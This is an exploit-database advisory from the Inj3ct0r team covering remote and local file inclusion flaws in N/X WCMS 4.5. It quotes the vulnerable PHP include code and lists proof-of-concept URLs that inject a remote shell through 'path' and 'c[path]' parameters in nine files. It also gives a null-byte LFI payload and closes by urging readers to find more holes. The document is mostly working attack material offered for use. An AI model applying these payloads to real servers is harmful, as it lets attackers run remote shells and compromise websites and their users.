1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 |
N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability =================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \__/'__<code>\/\ \__/'__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /' _ <code>\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/</code>'__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1########################################1 0I'm eidelweiss member from Inj3ct0r Team1 1########################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Work If: magic_quotes_gpc & magic_quotes_runtime Disable Download: http://sourceforge.net/projects/nxwcms/files/0.%20N_X%20WCMS%204.5%20System/4.5%20Release%201/nx45.zip/download Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thank<code>s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber sp3x (securityreason) get-well brother Special To: m4rc0 & LeQhi(thank</code>s so much brother , respect to you) Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/nx-web-cms-nx-wcms-45-multiple.html ======================================================================== Description: N/X 4.0 is a powerful content management system for the web. N/X CMS is focused on delivering content in many powerful ways. Its functions and content-types can be extended with the plugin-interface and a very very powerful API. ======================================================================== -=[ VULN C0de ]=- ************************************************** [-] nx_path/www/text.php ************************************************** <?PHP require_once "nxheader.inc.php"; include $cds->path."inc/header.php"; // Start of individual template echo $cds->content->get("Headline"); br(); echo $cds->content->get("Body"); include $cds->path."inc/footer.php"; require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/article.php ************************************************** <?PHP require_once "nxheader.inc.php"; require_once $cds->path."inc/header.php"; // get the id of the article from the request // do type validation echo $cds->cluster->draw($article); br(); br(); // link back to the page where the article was called echo $cds->content->get("Backlink Title"); require_once $cds->path."inc/footer.php"; require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/article_overview.php ************************************************** <?PHP require_once "nxheader.inc.php"; require_once $cds->path."inc/header.php"; // line 3 ***** require_once $cds->path."inc/footer.php"; // line 42 require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/sitemap.php ************************************************** <?PHP require_once "nxheader.inc.php"; include $cds->path."inc/header.php"; // line 3 ***** include $cds->path."inc/footer.php"; // line 56 require_once "nxfooter.inc.php"; ?> ************************************************** [-] nx_path/www/pagelayout.inc.php ************************************************** ************************************************** [-] nx_path/www/nxheader.inc.php ************************************************** <?php /* * Include this file in your page-templates */ if (isset($c["path"])) { require_once $c["path"]."config.inc.php"; } else { require_once "../cms/config.inc.php"; } include_once $c["path"]."api/cds/track_exit_pages.php"; require_once $c["path"]."api/cds/lib.inc.php"; ***** if ($c["pagetracking"]&& ! $c["usewebbug"]) { include_once $c["path"].'modules/stats/phpOpenTracker.php'; // line 31 @phpOpenTracker::log(array('document' => $page)); } require_once $c["path"]."ext/jpcache/jpcache.php"; // line 34 ************************************************** [-] nx_path/cms/api/xml/lib.inc.php ************************************************** <? require_once $c["path"] . "api/xml/xpath.class.php"; require_once $c["path"] . "api/xml/meta.php"; require_once $c["path"] . "api/xml/plugin.php"; require_once $c["path"] . "api/xml/cluster_template.php"; require_once $c["path"] . "api/xml/cluster.php"; require_once $c["path"] . "api/xml/sitepage_master.php"; require_once $c["path"] . "api/xml/syndication.php"; require_once $c["path"] . "api/xml/xmlapi_prepare.php"; ?> ************************************************** [-] nx_path/cms/api/parser/lib.inc.php ************************************************** <? require_once $c["path"] . "api/parser/nxparser.php"; require_once $c["path"] . "api/parser/class.filemanipulation.php"; require_once $c["path"] . "api/parser/class.mso2003.php"; require_once $c["path"] . "api/parser/class.openoffice.php"; require_once $c["path"] . "api/parser/nx2html.php"; require_once $c["path"] . "api/parser/html2nx.php"; require_once $c["path"] . "api/parser/launch_text.php"; require_once $c["path"] . "api/parser/importhtml.php"; require_once $c["path"] . "api/parser/importtext.php"; ?> ************************************************** [-] nx_path/cms/api/cms/lib.inc.php ************************************************** <? require_once $c["path"] . "api/cms/cache.php"; require_once $c["path"] . "api/cms/journal.php"; require_once $c["path"] . "api/cms/launch.php"; require_once $c["path"] . "api/cms/mass_operations.php"; require_once $c["path"] . "api/cms/oiddictionary.php"; require_once $c["path"] . "api/cms/paths.php"; require_once $c["path"] . "api/cms/plugin.php"; require_once $c["path"] . "api/cms/image.php"; require_once $c["path"] . "api/cms/sitepages.php"; require_once $c["path"] . "api/cms/sitepage_master.php"; require_once $c["path"] . "api/cms/synchronize.php"; require_once $c["path"] . "api/cms/cdsinformation.php"; require_once $c["path"] . "api/cms/acl/lib.inc.php"; require_once $c["path"] . "api/cms/log.php"; require_once $c["path"] . "api/cms/meta.php"; require_once $c["path"] . "api/cms/cluster_template.php"; require_once $c["path"] . "api/cms/cluster.php"; require_once $c["path"] . "api/cms/channel.php"; require_once $c["path"] . "api/cms/design.class.php"; require_once $c["path"] . "api/cms/designclasses.php" ?> ======================================================================== -=[ P0C RFI ]=- http://127.0.0.1/[NX_PATH]/www/text.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/article.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/article_overview.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/sitemap.php?path= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/pagelayout.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]= [inj3ct0r sh3ll] http://127.0.0.1/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]= [inj3ct0r sh3ll] etc , etc ,etc -=[ P0C LFI ]=- http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?page= [LFI]%00 etc , etc , etc, [*] So many vulnerability here , use your skill and play your imagination [*] [*] vuln inNX_path/wwwdev Directory i thing same with vuln in NX_path/www that<code>s why i don</code>t put here [*] =========================| -=[ E0F ]=- |================================= |